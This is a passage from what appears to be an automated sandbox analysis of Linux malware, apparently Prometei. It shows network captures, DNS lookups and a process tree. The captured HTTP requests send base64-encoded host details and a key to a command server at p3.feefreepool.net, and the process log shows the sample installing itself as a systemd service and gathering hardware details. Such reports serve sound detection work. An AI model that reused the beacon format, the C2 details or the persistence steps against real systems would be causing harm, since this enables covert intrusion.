                                                                                        Jan 26, 2022 00:03:16.861017942 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:16.861025095 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:16.861030102 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:16.861789942 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.862140894 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:16.863785982 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:16.921473980 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.210870028 CET5683280192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.232667923 CET805683288.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.232769012 CET5683280192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.235999107 CET5683280192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.291405916 CET805683288.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.291508913 CET5683280192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.291990995 CET805683288.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.292582035 CET5683280192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.314261913 CET805683288.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.766015053 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:17.766150951 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:17.766311884 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:17.824734926 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:18.113564014 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:18.113650084 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:18.115113974 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:18.173439980 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:18.173469067 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:18.173578024 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:18.173629999 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:03:28.382797003 CET42836443192.168.2.2391.189.91.43
                                                                                        Jan 26, 2022 00:03:32.478636980 CET4251680192.168.2.23109.202.202.202
                                                                                        Jan 26, 2022 00:03:57.054016113 CET43928443192.168.2.2391.189.91.42
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 26, 2022 00:03:11.213074923 CET3609253192.168.2.238.8.8.8
                                                                                        Jan 26, 2022 00:03:11.233828068 CET53360928.8.8.8192.168.2.23
                                                                                        Jan 26, 2022 00:03:12.600115061 CET4439480192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:12.623495102 CET804439488.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.623670101 CET4439480192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:16.859368086 CET4439480192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:17.191600084 CET5114253192.168.2.238.8.8.8
                                                                                        Jan 26, 2022 00:03:17.210695028 CET53511428.8.8.8192.168.2.23
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Jan 26, 2022 00:03:11.213074923 CET192.168.2.238.8.8.80x14d4Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                        Jan 26, 2022 00:03:17.191600084 CET192.168.2.238.8.8.80x14d4Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Jan 26, 2022 00:03:11.233828068 CET8.8.8.8192.168.2.230x14d4No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                        Jan 26, 2022 00:03:17.210695028 CET8.8.8.8192.168.2.230x14d4No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                        • p3.feefreepool.net
                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        0192.168.2.235683088.198.246.24280
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 26, 2022 00:03:11.263578892 CET1OUTGET /cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528 HTTP/1.0
                                                                                        Host: p3.feefreepool.net
                                                                                        Jan 26, 2022 00:03:11.322523117 CET1INHTTP/1.1 200 OK
                                                                                        Date: Tue, 25 Jan 2022 23:03:14 GMT
                                                                                        Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=windows-1251
                                                                                        Data Raw: 73 79 73 69 6e 66 6f
                                                                                        Data Ascii: sysinfo


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        1192.168.2.235683288.198.246.24280
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 26, 2022 00:03:17.235999107 CET8OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDM6MTUgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjQsIDEuMTQsIDAuNDUNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=7B1B0KLF45MTZ528&h=galassia&enckey=Ta1pdKIGXeZ1gPqtqpAABWQrTGI0Txhm/ucNR52U8J5cnErk73rBpKALxCiDcII8+wildfyzdI25Z1b/cPdmTXmrC+gX0Zfad6sapNc7u1PZiulmHAIVxJcZdMx4erMzjKsG3T5Ch+VvH6qExs+Mk9ylUCSqY2to5XfV7PA21Vk= HTTP/1.0
                                                                                        Host: p3.feefreepool.net
                                                                                        Jan 26, 2022 00:03:17.291405916 CET8INHTTP/1.1 200 OK
                                                                                        Date: Tue, 25 Jan 2022 23:03:20 GMT
                                                                                        Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                        Content-Length: 3
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=windows-1251
                                                                                        Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                                                        Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                        Jan 26, 2022 00:03:16.861789942 CET54.171.230.55443192.168.2.2333608CN=motd.ubuntu.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Nov 22 12:20:38 CET 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Feb 20 12:20:37 CET 2022 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2fb4726d465c5f28b84cd6d14cedd13a7
                                                                                        CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                        CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                        System Behavior

                                                                                        Start time:00:02:56
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:/tmp/PMidZ9jAKZ
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:02:56
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:02:56
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "pgrep PMidZ9jAKZ"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:56
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:56
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/pgrep
                                                                                        Arguments:pgrep PMidZ9jAKZ
                                                                                        File size:30968 bytes
                                                                                        MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                        Start time:00:02:57
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:02:57
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "pidof PMidZ9jAKZ"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:57
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:57
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/pidof
                                                                                        Arguments:pidof PMidZ9jAKZ
                                                                                        File size:27016 bytes
                                                                                        MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                        Start time:00:02:58
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:02:58
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "pgrep uplugplay"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:58
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:58
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/pgrep
                                                                                        Arguments:pgrep uplugplay
                                                                                        File size:30968 bytes
                                                                                        MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                        Start time:00:02:59
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:02:59
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "pgrep upnpsetup"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:59
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:02:59
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/pgrep
                                                                                        Arguments:pgrep upnpsetup
                                                                                        File size:30968 bytes
                                                                                        MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                        Start time:00:03:00
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:00
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "pidof upnpsetup"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:00
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:00
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/pidof
                                                                                        Arguments:pidof upnpsetup
                                                                                        File size:27016 bytes
                                                                                        MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                        Start time:00:03:02
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:02
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl daemon-reload"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:03
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:03
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl daemon-reload
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time:00:03:04
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:04
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl enable uplugplay.service"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:05
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:05
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl enable uplugplay.service
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/tmp/PMidZ9jAKZ
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl start uplugplay.service"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl start uplugplay.service
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time:00:03:04
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:n/a
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time:00:03:04
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File size:22760 bytes
                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:n/a
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time:00:03:07
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File size:22760 bytes
                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                        Start time:00:03:08
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:n/a
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time:00:03:08
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:/usr/sbin/uplugplay
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:09
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:09
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:09
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:09
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:09
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "cat /proc/cpuinfo"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cat
                                                                                        Arguments:cat /proc/cpuinfo
                                                                                        File size:43416 bytes
                                                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:10
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:11
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:12
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "dmidecode --type baseboard"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode --type baseboard
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:13
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c dmidecode
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:14
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:14
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/dmidecode
                                                                                        Arguments:dmidecode
                                                                                        File size:121856 bytes
                                                                                        MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                        Start time:00:03:14
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "cat /etc/os-release"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cat
                                                                                        Arguments:cat /etc/os-release
                                                                                        File size:43416 bytes
                                                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c uptime
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
